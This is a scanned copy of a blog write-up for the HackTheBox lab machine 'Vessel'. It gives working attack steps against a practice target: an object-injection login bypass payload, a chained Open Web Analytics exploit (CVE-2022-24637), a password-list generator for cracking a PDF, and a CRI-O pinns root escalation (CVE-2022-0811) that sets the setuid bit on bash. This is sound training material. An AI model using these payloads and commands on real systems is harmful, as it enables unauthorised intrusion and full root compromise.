hacktrickz.xyz
Open in
urlscan Pro
164.92.240.80
Public Scan
URL:
https://hacktrickz.xyz/hackthebox-writeup-vessel/
Submission: On May 12 via api from US — Scanned from DE
Submission: On May 12 via api from US — Scanned from DE
Form analysis
0 forms found in the DOMText Content
hacktrickz.xyz :: blog * home * writeups * whoami * contact By snow in hackthebox — Sep 9, 2022 HACKTHEBOX WRITEUP: VESSEL Writeup for the HTB machine "Vessel" by 0xM4hm0ud. ENUMERATION VIA NMAP There are 2 open services: * port 22: OpenSSH * port 80: Apache web server Browse the web application and get familiar with it: At first glance the website offers 3 functionalities: * login as existing user * registration ("currently not available") * password reset ("currently not available") Since we have no valid credentials, we quickly move on. We could try some basic SQL bypass techniques, but other than that nothing of interest here. Intercepting some requests via BurpSuite, we find out that the website is powered by Express ("X-Powered-By: Express"). ENUMERATE DIRECTORIES AND FILES There is one directory that sticks out: /dev/ Usually developers use some sort of version control system like git to manage their projects. Oddly enough, we didn't find the .git folder via gobuster, nor wfuzz. Nonetheless, we tried to recursively enumerate directory by assuming there is one – and we got some results back: Let's take a look at the Git index file (also known as Git cache), it stores the current state of the stage area. Dump the index with gin: Luckily, there is another tool called git-dumper that can dump the entire .git folder, instead of doing it manually: GitHub - arthaud/git-dumper: A tool to dump a git repository from a website A tool to dump a git repository from a website. Contribute to arthaud/git-dumper development by creating an account on GitHub. GitHubarthaud NODE.JS SQL INJECTION – OBJECT INSTEAD STRING Now we can view the source files and take a look at the authentication method used for the login logic. At the first glance it does not seem vulnerable. If you take a look at the git logs and commit history, you see that the developer fixed a security issue related to the SQL query. But after some time researching Node.js SQL injections, I stumbled upon this article: Node.js SQL Injection Guide: Examples and Prevention Learn about what Node.js SQL injection is, what a SQL injection attack looks like, and measures to prevent them. StackHawk The attacker can submit input that gets treated as an Object instead of a String value, which allows for authentication bypass. Change the initial POST body of the login endpoint to: username=admin&password[password]=1 the password field gets evaluted as an Object and we get authenticated as admin and have access to the panel. OPEN WEB ANALYTICS The dashboard reveals the subdomain openwebanalytics.vessel.htb: Searchsploit results didn't show anything interesting here, but we found a more recent CVE-2022-24637. The exploit consists of two vulnerabilities, which allow RCE when chained together. * a single quote / double quote confusion, which leads to information disclosure * a PHP file write, where the logfile path and log level can be changed by a manual POST request. The logfile can be set to a PHP file and an attacker can inject PHP code into this logfile by increasing the log level + generating an event with attacker controlled data > From Single / Double Quote Confusion To RCE (CVE-2022-24637) Note: Make sure you read the blog post a couple times, so you have a better understanding of what is happening. It's gonna become quite complex. I. RCE - PART ONE The vulnerable code can be found here: GitHub - Open-Web-Analytics/Open-Web-Analytics at 1.7.3 Official repository for Open Web Analytics which is an open source alternative to commercial tools such as Google Analytics. Stay in control of the data you collect about the use of your website or... GitHubOpen-Web-Analytics The code in fileCache.php is responsible for generating a cache file, which is then stored at /owa-data/caches/1/. The cache file gets generated by using the id of the first user, like so: md5(id1) -> fafe1b60c24107ccd8f4562213e44849 We can find a valid user / email, by using the password reset form. http://openwebanalytics.vessel.htb/index.php?owa_do=base.passwordResetForm We get an error message for ethan@vessel.htb, but admin@vessel.htb is a valid email. A failed login attempt generates a cache under: http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_configuration/ The cache can now be access at: http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php Curl the file to our local machine, base64 decode it and analyze it. We notice the temp_passkey mentioned in the blog post, which can now be submitted via the base.usersChangePassword action to change the password of "admin". http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword Remove the hidden property of the owa_k field, input the passkey and you should be able to change the password. The first part of the RCE is done. We can now login as admin and access the OWA panel. This leads us to the second part of the exploit... II. RCE - PART TWO There is a suitable Proof of Concept on Github for the CVE. A.) THE EASY WAY GitHub - Lay0us1/CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA) 1.7.3 Unauthenticated RCE in Open Web Analytics (OWA) 1.7.3 - GitHub - Lay0us1/CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA) 1.7.3 GitHubLay0us1 The foothold on the machine is established, we now operate as www-data. B.) THE HARD WAY ** to be updated ** POST EXPLOITATION: USER PASSWORDGENERATOR - GENERATE A PASSWORD LIST FOR NOTES.PDF Once we get foothold on the machine, we notice some files in steven's home directory: * passwordGenerator: a PE32 executable for MS Windows (compiled using pyinstaller) * a hidden notes folder containing: notes.pdf and screenshot.png The pdf file is password protected and the screenshot.png shows the password complexity that is used to generate the password. Decompile the executable using pyinstxtractor to get a .pyc file that cointains the byte code. Then, use uncompyle6 to decompile passwordGenerator.pyc. The code reveals the password generator logic. We have 32**128 possible combinations, but due to Qt's random number generator implementation we can generate a suitable wordlist. Copy the genPassword code and modify it by creating a while loop to construct passwords of the length 32. from PySide2.QtCore import * def genPassword(): length = 32 char = 0 if char == 0: charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?' else: if char == 1: charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' else: if char == 2: charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890' else: pass try: qsrand(QTime.currentTime().msec()) password = '' for i in range(length): idx = qrand() % len(charset) nchar = charset[idx] password += str(nchar) except: print('error') return password def gen_possible_passes(): passes = [] try: while True: ps = genPassword() if ps not in passes: passes.append(ps) # print(ps) print(len(passes)) except KeyboardInterrupt: with open('pass.txt', 'w') as ofile: for p in passes: ofile.write(p + '\n') gen_possible_passes() The generated wordlist pass.txt can now be used with pdfcrack to read the content of notes.pdf. pdfcrack -f notes.pdf -w ~/hackthebox/vessel/passwordGenerator_extracted/pass.txt YG7Q7RDzA+q&ke~MJ8!y********** found user-password: 'YG7Q7RDzA+q&ke~MJ8!********' Open notes.pdf... ...get the password for ethan and SSH into the machine to grab the user.txt flag. POST EXPLOITATION: ROOT As usual, we get a execute linpeas.sh on the target machine and analyze its output: There is a file /usr/bin/pinns, which is owned by root and can be read by our current user ethan. After some time on Google, we find this blog post: cr8escape: New Vulnerability in CRI-O Container Engine (CVE-2022-0811) Learn how CrowdStrike discovered a new vulnerability in the CRI-O Container Engine (CVE-2022-0811), and what organizations can do to remediate this vulnerability. crowdstrike.comJohn Walker - Manoj Ahuje PROOF OF CONCEPT: 1. Create a directory /tmp/foo and cd into the directory, there run these commands: runc spec --rootless mkdir rootfs vi config.json Hint: There are scripts that keep deleting stuff in various directories. (see pspy64 output) 2. In the "mounts" section of config.json append the following entry: { "type": "bind", "source": "/", "destination": "/", "options": [ "rbind", "rw", "rprivate" ] }, 3. In the previously created /tmp/foo/ directory, run: runc --root /tmp/foo run alpine We're now inside a read-only container. 4. In another SSH session, create a bar.sh script , which sets the setuid bit of /usr/bin/bash. echo -e '#!/bin/sh\nchmod +s /usr/bin/bash' > /tmp/foo/bar.sh && chmod +x /tmp/foo/bar.sh 5. Now use pinns to assign the kernel.core_pattern a value, so once the core dump occurs, it executes our malicious script. pinns -d /var/run -f 844aa3c8-2c60-4245-a7df-9e26768ff303 -s 'kernel.shm_rmid_forced=1+kernel.core_pattern=|/tmp/foo/bar.sh #' --ipc --net --uts --cgroup 6. Trigger a core dump in the read-only container. # ulimit -c unlimited # tail -f /dev/null & # ps # bash -i # kill -SIGSEGV $num # ps 7. Check if the setuid bit has been set to /usr/bin/bash, then gain effective root. bash -p Yay! We finally rooted the machine! CONCLUSION This machine has been a great experience. From the initial enumeration, where we found the .git directory, that we dumped to gain access to source code files. The authentication check for the login endpoint was bypassed by submitting a Object instead of a String. The Open Web Analytics instance that was hosted on another subdomain was vulnerable to a recent CVE – we had to chain two vulnerablities to get code execution and the initial foothold to the machine. The post exploitation phase for the user was easy if you know your tools to decompile executables created by PyInstaller. The trickest part of the box was the way to root, where we had to abuse pinns functionality to execute our malicious script allowed the attacker to gain effective root. Previous HACKTHEBOX WRITEUP: UPDOWN Next HACKTHEBOX WRITEUP: SEVENTEEN YOU MIGHT ALSO LIKE... hackthebox HACKTHEBOX WRITEUP: POLLUTION NMAP SCAN The nmap scan reveals a Debian machine with 3 open Read More hackthebox HACKTHEBOX WRITEUP: MODERATORS Writeup for HTB machine "moderators" by kavigihan Read More hackthebox HACKTHEBOX WRITEUP: CARPEDIEM Writeup for "Carpediem" HackTheBox machine by TheCyberGeek and d4rkpayl0ad. Read More hackthebox HACKTHEBOX WRITEUP: AMBASSADOR Detailed writeup for 'Ambassador' machine from HackTheBox by DirectRoot. Read More hacktrickz.xyz :: blog © 2023 * contact * blog Powered by Ghost